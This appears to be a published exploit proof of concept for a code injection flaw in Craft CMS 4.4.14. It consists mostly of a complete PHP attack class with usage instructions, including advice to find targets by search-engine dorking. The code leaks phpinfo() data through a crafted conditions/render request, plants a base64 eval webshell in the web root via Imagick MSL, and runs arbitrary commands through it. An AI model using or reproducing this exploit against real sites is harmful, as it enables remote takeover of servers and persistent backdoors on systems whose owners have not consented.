=============================================================================================================================================
| # Title     : Craft CMS 4.4.14 Code Injection Vulnerability                                                                               |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits)                                                            |
| # Vendor    : https://craftcms.com/                                                                                                       |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] uses the CURL to Allow remote command .

[+] Line 116 set your target .

[+] save code as poc.php .

[+] USage : cmd => c:\www\test\php poc.php 

[+] PayLoad :

<?php
class CraftCMSExploit {
    private $target_uri;
    private $webshell;
    private $config = ['upload_tmp_dir' => null, 'document_root' => null];
    private $post_param;
    private $get_param;

    public function __construct($target_uri, $webshell = '') {
        $this->target_uri = $target_uri;
        $this->webshell = $webshell ? $webshell : $this->generateRandomString(8, 16) . '.php';
        $this->post_param = $this->generateRandomString(1, 8);
        $this->get_param = $this->generateRandomString(1, 8);
    }

    public function check_phpinfo() {
        // Sends a crafted request to extract upload_tmp_dir and document_root from phpinfo()
        $data = http_build_query([
            'action' => 'conditions/render',
            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',
            'config' => '{"name":"configObject","as ":{"class":"\\\GuzzleHttp\\\Psr7\\\FnStream", "__construct()":{"methods":{"close":"phpinfo"}}}}'
        ]);

        $response = $this->sendPostRequest($this->target_uri, $data);
        if ($response) {
            $this->parsePHPInfo($response);
        }
    }

    private function parsePHPInfo($response) {
        // Parses the phpinfo() HTML response to find upload_tmp_dir and document_root
        if (preg_match('/upload_tmp_dir.+<td class="v">(.*)<\/td>/i', $response, $matches)) {
            $this->config['upload_tmp_dir'] = $matches[1] == 'no value' ? '/tmp' : trim($matches[1]);
        }
        if (preg_match('/DOCUMENT_ROOT.+<td class="v">(.*)<\/td>/i', $response, $matches)) {
            $this->config['document_root'] = trim($matches[1]);
        }
    }

    public function upload_webshell() {
        // Generates an XML payload to upload the webshell via Imagick MSL
        $payload = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>
        <image>
            <read filename=\"caption:<?php @eval(base64_decode(\$_POST['{$this->post_param}'])); ?>\" />
            <write filename=\"info:{$this->config['document_root']}/{$this->webshell}\" />
        </image>";

        $form_data = [
            'action' => 'conditions/render',
            'configObject[class]' => 'craft\\elements\\conditions\\ElementCondition',
            'config' => '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/dev/null"}}}',
            'payload' => $payload
        ];

        $response = $this->sendMultipartPostRequest($this->target_uri, $form_data);
        return strpos($response, '502') !== false;
    }

    public function execute_command($cmd) {
        // Executes a command on the server via the uploaded webshell
        $payload = base64_encode($cmd);
        $data = http_build_query([$this->post_param => $payload]);

        return $this->sendPostRequest($this->target_uri . '/' . $this->webshell, $data);
    }

    private function sendPostRequest($uri, $data) {
        $options = [
            'http' => [
                'header' => "Content-type: application/x-www-form-urlencoded\r\n",
                'method' => 'POST',
                'content' => $data,
            ],
        ];
        $context = stream_context_create($options);
        return file_get_contents($uri, false, $context);
    }

    private function sendMultipartPostRequest($uri, $data) {
        // Sends a multipart form-data POST request
        $boundary = uniqid();
        $delimiter = '------' . $boundary;

        $post_data = $this->buildMultipartData($data, $delimiter);

        $options = [
            'http' => [
                'header' => "Content-Type: multipart/form-data; boundary=" . $boundary . "\r\n",
                'method' => 'POST',
                'content' => $post_data,
            ],
        ];

        $context = stream_context_create($options);
        return file_get_contents($uri, false, $context);
    }

    private function buildMultipartData($data, $delimiter) {
        $post_data = '';
        foreach ($data as $name => $content) {
            $post_data .= "--$delimiter\r\n";
            $post_data .= "Content-Disposition: form-data; name=\"$name\"\r\n\r\n";
            $post_data .= "$content\r\n";
        }
        $post_data .= "--$delimiter--\r\n";
        return $post_data;
    }

    private function generateRandomString($min, $max) {
        $length = rand($min, $max);
        return substr(str_shuffle('abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'), 0, $length);
    }
}

// Usage
$exploit = new CraftCMSExploit('http://target-craftcms.com');
$exploit->check_phpinfo();
if ($exploit->upload_webshell()) {
    echo $exploit->execute_command('whoami');
}
?>



Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================